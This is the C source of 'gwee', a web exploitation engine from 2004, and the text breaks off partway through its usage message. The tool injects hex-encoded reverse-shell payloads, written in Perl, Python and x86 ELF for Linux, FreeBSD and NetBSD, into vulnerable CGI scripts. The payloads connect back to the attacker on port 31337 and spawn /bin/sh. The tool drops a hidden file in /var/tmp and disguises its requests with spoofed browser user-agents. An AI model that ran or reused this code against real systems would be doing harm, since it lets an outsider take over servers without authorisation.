/* Copyright notice:
 *
 * gwee - Generic Web Exploitation Engine - $Revision: 1.36 $
 * Copyright (C) 2004 Michel Blomgren <michel@cycom.se>
 * Perl and Python shellcode and expertise by Sabu <sabu@sentinix.org>
 *
 * License (MIT):
 *
 * Permission is hereby granted, free of charge, to any person obtaining a
 * copy of this software and associated documentation files (the "Software"),
 * to deal in the Software without restriction, including without limitation
 * the rights to use, copy, modify, merge, publish, distribute, sublicense,
 * and/or sell copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following conditions:
 *
 * The above copyright notice and this permission notice shall be included in
 * all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
 * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
 * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
 * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
 * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
 * DEALINGS IN THE SOFTWARE.
 *
 ******************************************************************************
 *
 * Acknowledgements: Sabu, Nullbyte, uDc, s9c!
 *
 ******************************************************************************
 *
 * Changelog:
 *  - Tue May 26 2004:
 *    Replaced ascii-encoded octal with ascii-encoded hex instead. Added
 *    sishell 0.2 (for x86 Linux, FreeBSD and NetBSD).
 *
 *  - Mon Feb 9 2004 (1.12):
 *    Initial version, 
 *
 ******************************************************************************
 *
 * Compile like this:
 *      gcc -s -O2 -o gwee gwee.c
 *
 * Usage:
 *  ./gwee -l my_IP_or_hostname [-p port] http://targeturl/cgi-bin/vuln.cgi
 *
 * Default connect-back port is 31337, change with -p yourport.
 *
 */
static unsigned char rcsid[] =
"$Id: gwee.c,v 1.36 2004/07/12 03:13:46 shadow Exp $";

#ifdef WIN32
    #define __USE_WIN32_SOCKETS

    #include <stdio.h>
    #include <fcntl.h>
    #include <io.h>
    #include <conio.h>
    #include <winsock.h>
    #include <getopt.h>
    #include <ctype.h>
    #include <windows.h>
    #include <process.h>
#else
    #include <stdio.h>
    #include <stdlib.h>
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <sys/time.h>
    #include <sys/wait.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <sys/select.h>
    #include <signal.h>

    #include <ctype.h>

    extern int errno;
    extern int h_errno;
#endif


#if defined WITH_SSL
    #include <openssl/crypto.h>
    #include <openssl/x509.h>
    #include <openssl/pem.h>
    #include <openssl/evp.h>
    #include <openssl/ssl.h>
    #include <openssl/err.h>
#else
    #warning compiling without https support, use -DWITH_SSL -lssl -lcrypto for https support.
#endif

#ifndef INADDR_NONE
    #define INADDR_NONE 0xffffffff
#endif

extern char *optarg;
extern int optind, opterr, optopt;

/* default port that shellcode will connect back to */
#define DEFBACKPORT     31337

/*** global variables ************************************************/

/* the -y -z option combo... */
char *y_opt = "";
char *z_opt = "";

/* TMPFILE is the filename of the shellcode on the target box */
char *TMPFILE = "/var/tmp/.vetx.95";

char *user_agent = NULL;

char *wgeturl = NULL;
char *dumpout = NULL;

char *url = NULL;
unsigned int httpget = 0,
             remove_sploit = 0,
             force = 0,
             shellcode = 0,
             injection_method = 0,
             verbose = 0,
             silent = 0,
             builtin_listener = 0,
             timeout = 30,
             only_listen = 0,
             dowipeout = 1,
             i;

#ifdef WIN32
    int pongsilent = 0;
#endif

/* these variables are only used when httpget == 1 */
char httpmethod_get[] = "GET";
char httpmethod_head[] = "HEAD";
char *httpmethod = httpmethod_get;

/* buffers and temporary variables */
char buf[4096];
char buf2[4096];

char *tempmem1;
char *tempmem2;
char *tempmem3;
char *tempmem4;

char *shellcode_split1;
char *shellcode_split2;
char *shellcode_split3;
char *shellcode_split4;


uint32_t binary_ip;
uint32_t xored_ip;
char ascii_ip[16];

char *listen_server = NULL;
uint16_t lport = DEFBACKPORT;
uint16_t sourceport = 0;

char *shellcode_p = NULL;
char *imprefix = "";

struct hostent *he;

char piece1_text[] = "[+] injecting shellcode piece 1/4";
char piece2_text[] = "[+] injecting shellcode piece 2/4";
char piece3_text[] = "[+] injecting shellcode piece 3/4";
char piece4_text[] = "[+] injecting shellcode piece 4/4";

/* if with OpenSSL support (for https) add these... */
#if defined(WITH_SSL)
    SSL_METHOD *sslmethod;
    SSL_CTX *sslctx;
    SSL *ssl;
    X509 *peer_cert;
#endif


/*** injection methods ***********************************************/

#define IM_PERL    0
#define IM_PYTHON  1
#define IM_PRINTF  2
#define IM_ECHO    3

/*** shellcode *******************************************************/

#define SABUSHELL_PERL      0
#define LINUX_SISHELL       1
#define FREEBSD_SISHELL     2
#define NETBSD_SISHELL      3
#define SABUSHELL_PYTHON    4

#define XOR 0xffffffff

/* Sabu's reverse Perl shellcode */
unsigned char sabushell_perl[] =
    "\\x23\\x21\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x70"
    "\\x65\\x72\\x6c\\x0a\\x75\\x73\\x65\\x20\\x53\\x6f\\x63\\x6b"
    "\\x65\\x74\\x3b\\x20\\x75\\x73\\x65\\x20\\x49\\x4f\\x3a\\x3a"
    "\\x48\\x61\\x6e\\x64\\x6c\\x65\\x3b\\x20\\x75\\x73\\x65\\x20"
    "\\x50\\x4f\\x53\\x49\\x58\\x3b\\x20\\x24\\x70\\x72\\x6f\\x74"
    "\\x6f\\x20\\x3d\\x20\\x67\\x65\\x74\\x70\\x72\\x6f\\x74\\x6f"
    "\\x62\\x79\\x6e\\x61\\x6d\\x65\\x28\\x27\\x74\\x63\\x70\\x27"
    "\\x29\\x3b\\x20\\x73\\x6f\\x63\\x6b\\x65\\x74\\x28\\x53\\x6f"
    "\\x63\\x6b\\x65\\x74\\x5f\\x48\\x61\\x6e\\x64\\x6c\\x65\\x2c"
    "\\x20\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x20\\x53\\x4f"
    "\\x43\\x4b\\x5f\\x53\\x54\\x52\\x45\\x41\\x4d\\x2c\\x20\\x24"
    "\\x70\\x72\\x6f\\x74\\x6f\\x29\\x3b\\x20\\x24\\x73\\x69\\x6e"
    "\\x20\\x3d\\x20\\x73\\x6f\\x63\\x6b\\x61\\x64\\x64\\x72\\x5f"
    "\\x69\\x6e\\x28\\x37\\x37\\x30\\x30\\x20\\x2c\\x69\\x6e\\x65"
    "\\x74\\x5f\\x61\\x74\\x6f\\x6e\\x28\\x22\\x31\\x32\\x37\\x2e"
    "\\x30\\x2e\\x30\\x2e\\x31\\x22\\x20\\x20\\x20\\x20\\x20\\x20"
    "\\x29\\x29\\x3b\\x20\\x63\\x6f\\x6e\\x6e\\x65\\x63\\x74\\x28"
    "\\x53\\x6f\\x63\\x6b\\x65\\x74\\x5f\\x48\\x61\\x6e\\x64\\x6c"
    "\\x65\\x2c\\x24\\x73\\x69\\x6e\\x29\\x3b\\x20\\x64\\x75\\x70"
    "\\x32\\x28\\x53\\x6f\\x63\\x6b\\x65\\x74\\x5f\\x48\\x61\\x6e"
    "\\x64\\x6c\\x65\\x2d\\x3e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x2c"
    "\\x20\\x30\\x29\\x3b\\x20\\x64\\x75\\x70\\x32\\x28\\x53\\x6f"
    "\\x63\\x6b\\x65\\x74\\x5f\\x48\\x61\\x6e\\x64\\x6c\\x65\\x2d"
    "\\x3e\\x66\\x69\\x6c\\x65\\x6e\\x6f\\x2c\\x20\\x31\\x29\\x3b"
    "\\x20\\x64\\x75\\x70\\x32\\x28\\x53\\x6f\\x63\\x6b\\x65\\x74"
    "\\x5f\\x48\\x61\\x6e\\x64\\x6c\\x65\\x2d\\x3e\\x66\\x69\\x6c"
    "\\x65\\x6e\\x6f\\x2c\\x20\\x32\\x29\\x3b\\x20\\x65\\x78\\x65"
    "\\x63\\x20\\x7b\\x20\\x22\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68"
    "\\x22\\x20\\x7d\\x20\\x22\\x22\\x3b\\x0a";
#define sabushell_perl_ip_offset    700
#define sabushell_perl_ipbuf_len    17
#define sabushell_perl_port_offset  636
#define sabushell_perl_portbuf_len  5


/* Shadowinteger's reverse shellcode,
 * hardcoded (no arguments) x86 linux binary (elf) */
unsigned char linux_sishell[] = /* Shadowinteger's sishell 0.2 */
    "\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x03\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00"
    "\\x80\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x44\\x01\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00"
    "\\x03\\x00\\x02\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\x32\\x01\\x00\\x00"
    "\\x32\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x10\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8b\\x04\\x24\\x40"
    "\\x40\\x8d\\x1c\\x84\\x89\\xdd\\x6a\\x06\\x6a\\x01\\x6a\\x02"
    "\\x8d\\x1c\\x24\\x89\\xd9\\x31\\xdb\\xb3\\x01\\x31\\xc0\\xb0"
    "\\x66\\xcd\\x80\\x89\\xc7\\x83\\xec\\x08\\x31\\xc9\\xc6\\x04"
    "\\x24\\x02\\x88\\x4c\\x24\\x01\\xb8\\x80\\xff\\xff\\xfe\\x35"
    "\\xff\\xff\\xff\\xff\\x66\\xc7\\x44\\x24\\x02\\x7a\\x69\\x89"
    "\\x44\\x24\\x04\\x8d\\x04\\x24\\x83\\xec\\x10\\x89\\x3c\\x24"
    "\\x89\\x44\\x24\\x04\\x31\\xc0\\xb0\\x10\\x89\\x44\\x24\\x08"
    "\\x31\\xc0\\xb0\\x66\\x31\\xdb\\xb3\\x03\\x8d\\x14\\x24\\x89"
    "\\xd1\\xcd\\x80\\x85\\xc0\\x78\\x38\\x31\\xc9\\x31\\xc0\\xb0"
    "\\x3f\\x89\\xfb\\xcd\\x80\\x41\\x80\\xf9\\x02\\x76\\xf2\\x83"
    "\\xec\\x10\\x8d\\x44\\x24\\x08\\x89\\x04\\x24\\x31\\xdb\\x89"
    "\\x5c\\x24\\x04\\x89\\x5c\\x24\\x08\\xbb\\x2a\\x81\\x04\\x08"
    "\\x8d\\x14\\x24\\x89\\xd1\\x89\\xea\\x31\\xc0\\xb0\\x0e\\x2c"
    "\\x03\\xcd\\x80\\x31\\xc0\\x89\\xc3\\x40\\xcd\\x80\\x2f\\x62"
    "\\x69\\x6e\\x2f\\x73\\x68\\x00\\x00\\x2e\\x73\\x68\\x73\\x74"
    "\\x72\\x74\\x61\\x62\\x00\\x2e\\x74\\x65\\x78\\x74\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00"
    "\\x06\\x00\\x00\\x00\\x80\\x80\\x04\\x08\\x80\\x00\\x00\\x00"
    "\\xb2\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00"
    "\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x32\\x01\\x00\\x00\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00";
#define linux_IP_OFFSET 700
#define linux_PORT_OFFSET 756


unsigned char freebsd_sishell[] = /* Shadowinteger's sishell 0.2 */
    "\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x09\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00"
    "\\x80\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x24\\x01\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x01\\x00\\x28\\x00"
    "\\x03\\x00\\x02\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\x13\\x01\\x00\\x00"
    "\\x13\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x10\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8b\\x04\\x24\\x40"
    "\\x40\\x8d\\x1c\\x84\\x89\\xdd\\x6a\\x06\\x6a\\x01\\x6a\\x02"
    "\\x31\\xc0\\xb0\\x61\\x50\\xcd\\x80\\x89\\xc7\\x83\\xec\\x08"
    "\\x31\\xc9\\xc6\\x04\\x24\\x02\\x88\\x4c\\x24\\x01\\xb8\\x80"
    "\\xff\\xff\\xfe\\x35\\xff\\xff\\xff\\xff\\x66\\xc7\\x44\\x24"
    "\\x02\\x7a\\x69\\x89\\x44\\x24\\x04\\x8d\\x04\\x24\\x6a\\x10"
    "\\x50\\x57\\x31\\xc0\\xb0\\x62\\x50\\xcd\\x80\\x72\\x38\\x31"
    "\\xc9\\x51\\x57\\x31\\xc0\\xb0\\x5a\\x50\\xcd\\x80\\x41\\x80"
    "\\xf9\\x02\\x76\\xf1\\x83\\xec\\x10\\x8d\\x44\\x24\\x08\\x89"
    "\\x04\\x24\\x31\\xdb\\x89\\x5c\\x24\\x04\\x89\\x5c\\x24\\x08"
    "\\x8d\\x14\\x24\\x89\\xd1\\x55\\x51\\x68\\x0b\\x81\\x04\\x08"
    "\\x31\\xc0\\xb0\\x3b\\x50\\xcd\\x80\\x31\\xc0\\x50\\xfe\\xc0"
    "\\x50\\xcd\\x80\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x00"
    "\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74"
    "\\x65\\x78\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00"
    "\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x80\\x80\\x04\\x08"
    "\\x80\\x00\\x00\\x00\\x93\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x13\\x01\\x00\\x00\\x11\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00";
#define freebsd_IP_OFFSET 668
#define freebsd_PORT_OFFSET 724


unsigned char netbsd_sishell[] = /* Shadowinteger's sishell 0.2 */
    "\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x02\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x02\\x00\\x03\\x00\\x01\\x00\\x00\\x00"
    "\\xb0\\x80\\x04\\x08\\x34\\x00\\x00\\x00\\x68\\x01\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x34\\x00\\x20\\x00\\x02\\x00\\x28\\x00"
    "\\x04\\x00\\x03\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x80\\x04\\x08\\x00\\x80\\x04\\x08\\x43\\x01\\x00\\x00"
    "\\x43\\x01\\x00\\x00\\x05\\x00\\x00\\x00\\x00\\x10\\x00\\x00"
    "\\x04\\x00\\x00\\x00\\x94\\x00\\x00\\x00\\x94\\x80\\x04\\x08"
    "\\x94\\x80\\x04\\x08\\x18\\x00\\x00\\x00\\x18\\x00\\x00\\x00"
    "\\x04\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x07\\x00\\x00\\x00\\x04\\x00\\x00\\x00"
    "\\x01\\x00\\x00\\x00\\x4e\\x65\\x74\\x42\\x53\\x44\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8b\\x04\\x24\\x40"
    "\\x40\\x8d\\x1c\\x84\\x89\\xdd\\x6a\\x06\\x6a\\x01\\x6a\\x02"
    "\\x31\\xc0\\xb0\\x61\\x50\\xcd\\x80\\x89\\xc7\\x83\\xec\\x08"
    "\\x31\\xc9\\xc6\\x04\\x24\\x02\\x88\\x4c\\x24\\x01\\xb8\\x80"
    "\\xff\\xff\\xfe\\x35\\xff\\xff\\xff\\xff\\x66\\xc7\\x44\\x24"
    "\\x02\\x7a\\x69\\x89\\x44\\x24\\x04\\x8d\\x04\\x24\\x6a\\x10"
    "\\x50\\x57\\x31\\xc0\\xb0\\x62\\x50\\xcd\\x80\\x72\\x38\\x31"
    "\\xc9\\x51\\x57\\x31\\xc0\\xb0\\x5a\\x50\\xcd\\x80\\x41\\x80"
    "\\xf9\\x02\\x76\\xf1\\x83\\xec\\x10\\x8d\\x44\\x24\\x08\\x89"
    "\\x04\\x24\\x31\\xdb\\x89\\x5c\\x24\\x04\\x89\\x5c\\x24\\x08"
    "\\x8d\\x14\\x24\\x89\\xd1\\x55\\x51\\x68\\x3b\\x81\\x04\\x08"
    "\\x31\\xc0\\xb0\\x3b\\x50\\xcd\\x80\\x31\\xc0\\x50\\xfe\\xc0"
    "\\x50\\xcd\\x80\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\\x00\\x00"
    "\\x2e\\x73\\x68\\x73\\x74\\x72\\x74\\x61\\x62\\x00\\x2e\\x74"
    "\\x65\\x78\\x74\\x00\\x2e\\x6e\\x6f\\x74\\x65\\x2e\\x6e\\x65"
    "\\x74\\x62\\x73\\x64\\x2e\\x69\\x64\\x65\\x6e\\x74\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x00\\x00"
    "\\x06\\x00\\x00\\x00\\xb0\\x80\\x04\\x08\\xb0\\x00\\x00\\x00"
    "\\x93\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x10\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x11\\x00\\x00\\x00"
    "\\x07\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x94\\x80\\x04\\x08"
    "\\x94\\x00\\x00\\x00\\x18\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x01\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x43\\x01\\x00\\x00\\x24\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00"
    "\\x00\\x00\\x00\\x00";
#define netbsd_IP_OFFSET 860
#define netbsd_PORT_OFFSET 916


/* Sabu's uber sexy python reverse (connecting) shellcode */
unsigned char sabushell_python[] =
    "\\x23\\x21\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x65"
    "\\x6e\\x76\\x20\\x70\\x79\\x74\\x68\\x6f\\x6e\\x0a\\x73\\x3d"
    "\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27"
    "\\x73\\x6f\\x63\\x6b\\x65\\x74\\x27\\x29\\x2e\\x73\\x6f\\x63"
    "\\x6b\\x65\\x74\\x28\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74"
    "\\x5f\\x5f\\x28\\x27\\x73\\x6f\\x63\\x6b\\x65\\x74\\x27\\x29"
    "\\x2e\\x41\\x46\\x5f\\x49\\x4e\\x45\\x54\\x2c\\x5f\\x5f\\x69"
    "\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x73\\x6f\\x63"
    "\\x6b\\x65\\x74\\x27\\x29\\x2e\\x53\\x4f\\x43\\x4b\\x5f\\x53"
    "\\x54\\x52\\x45\\x41\\x4d\\x29\\x3b\\x73\\x2e\\x63\\x6f\\x6e"
    "\\x6e\\x65\\x63\\x74\\x28\\x28\\x27\\x31\\x32\\x37\\x2e\\x30"
    "\\x2e\\x30\\x2e\\x31\\x27\\x2c\\x37\\x37\\x30\\x30\\x20\\x20"
    "\\x20\\x20\\x20\\x20\\x20\\x29\\x29\\x3b\\x5f\\x5f\\x69\\x6d"
    "\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29"
    "\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x2e\\x66\\x69\\x6c\\x65"
    "\\x6e\\x6f\\x28\\x29\\x2c\\x30\\x29\\x3b\\x5f\\x5f\\x69\\x6d"
    "\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29"
    "\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x2e\\x66\\x69\\x6c\\x65"
    "\\x6e\\x6f\\x28\\x29\\x2c\\x31\\x29\\x3b\\x5f\\x5f\\x69\\x6d"
    "\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29"
    "\\x2e\\x64\\x75\\x70\\x32\\x28\\x73\\x2e\\x66\\x69\\x6c\\x65"
    "\\x6e\\x6f\\x28\\x29\\x2c\\x32\\x29\\x3b\\x5f\\x5f\\x69\\x6d"
    "\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29"
    "\\x2e\\x65\\x78\\x65\\x63\\x6c\\x28\\x27\\x2f\\x62\\x69\\x6e"
    "\\x2f\\x73\\x68\\x27\\x2c\\x27\\x27\\x29\\x0a";
#define sabushell_python_ip_offset  504
#define sabushell_python_ipbuf_len  23


/* user-agents to mask as */
char *agents[] = { (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
                   (char *) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007 Firebird/0.7",
                   (char *) "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.0) Gecko/20020623 Debian/1.0.0-0.woody.1",
                   (char *) "Mozilla/5.0 (Windows; U; Win 9x 4.90; fr-FR; rv:1.5) Gecko/20031007",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040115",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Opera 7.20  [en]",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7b) Gecko/20040421 Galeon/1.3.14",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0) Opera 7.23  [pl]",
                   (char *) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.6b) Gecko/20031217 Firebird/0.7+",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)",
                   (char *) "Mozilla/5.0 (compatible; Konqueror/3.1; Linux)",
                   (char *) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20030925",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686) Gecko/20031119 Galeon/1.3.7",
                   (char *) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.0.2) Gecko/20021120 Netscape/7.01",
                   (char *) "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.0.2) Gecko/20030208 Netscape/7.02",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Avant Browser [avantbrowser.com]; MyIE2; .NET CLR 1.1.4322)",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; H010818; FunWebProducts-MyWay)",
                   (char *) "Mozilla/4.0 (compatible; MSIE 6.0; AOL 7.0; Windows NT 5.1; Q312461)",
                   (char *) "Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.6) Gecko/20040206 Firefox/0.8",
                   (char *) "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.6) Gecko/20040116 MultiZilla/1.6.3.1d"
                 };
unsigned int number_of_agents = sizeof(agents)/sizeof(char *);


/*** functions *******************************************************/

/*
 * get_revision() - extracts the revision number from a RCS Id string
 */
unsigned char *get_revision(unsigned char *string) {
/*
 * input string is an RCS Id keyword
 */
    char Id_string[] = "$Id: ";
    char *idstart;
    static unsigned char revision[16];
    int a, x, column_counter;

    if (!(idstart = strstr(string, Id_string))) {
        return NULL;
    }

    idstart += strlen(Id_string);

    column_counter = 1;
    x = 0;
    for (a = 0; x < (sizeof(revision)-1); a++) {
        if (idstart[a] == 0)
            return NULL;

        if (column_counter < 2) {
            if (idstart[a] == 0x20)
                column_counter++;
        } else {      /* column 2 is the rcs revision number */
            if (((idstart[a] < '0') || (idstart[a] > '9')) && (idstart[a] != '.'))
                break;
            revision[x] = idstart[a];
            x++;
        }
    }

    revision[x] = 0;
    return revision;
}



void usage(void) {
    printf("gwee %s - generic web exploitation engine\n"
"Copyright (C) 2004 Michel Blomgren <michel@cycom.se>\n"
"Perl and Python shellcode and expertise by Sabu -> http://sabu.net\n"
"%s\n"
"\n"
"Permission is hereby granted, free of charge, to any person obtaining a copy\n"
"of this software and associated documentation files (the \"Software\"), to deal\n"
"in the Software without restriction, including without limitation the rights\n"
"to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n"
"copies of the Software, and to permit persons to whom the Software is\n"
"furnished to do so, subject to the following conditions:\n"
"\n"
"The above copyright notice and this permission notice shall be included in all\n"
"copies or substantial portions of the Software.\n"
"\n"
"THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n"
"IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n"
"FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n"
"AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n"
"LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n"
"OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n"
"SOFTWARE.\n"
"\n"
"Usage: gwee [options] [target_url]\n"
"[target_url] is the full URL to the vulnerable web script, e.g.:\n"
"   http://target.tld/cgi-bin/openwebmail/userstat.pl\n"
"-h\n"
"   This help.\n"
"-V\n"
"   Print banner and exit.\n"
"-y string\n"
"   The parameter to insert before the shellcode injection command line is\n"
"   inserted. The shellcode is inserted between the values of the -y option and\n"
"   the -z option. In POST requests (default behaviour), the -y and -z options\n"
"   go into the POST data, not in the URL. In GET and HEAD requests, the \"-y\n"
"   <shellcode> -z\" option combination is appended to the URL. If you need to\n"
"   add a '?' you can do that either in the URL or as the first char of the -y\n"
"   option. By default, -y and -z are empty.\n"
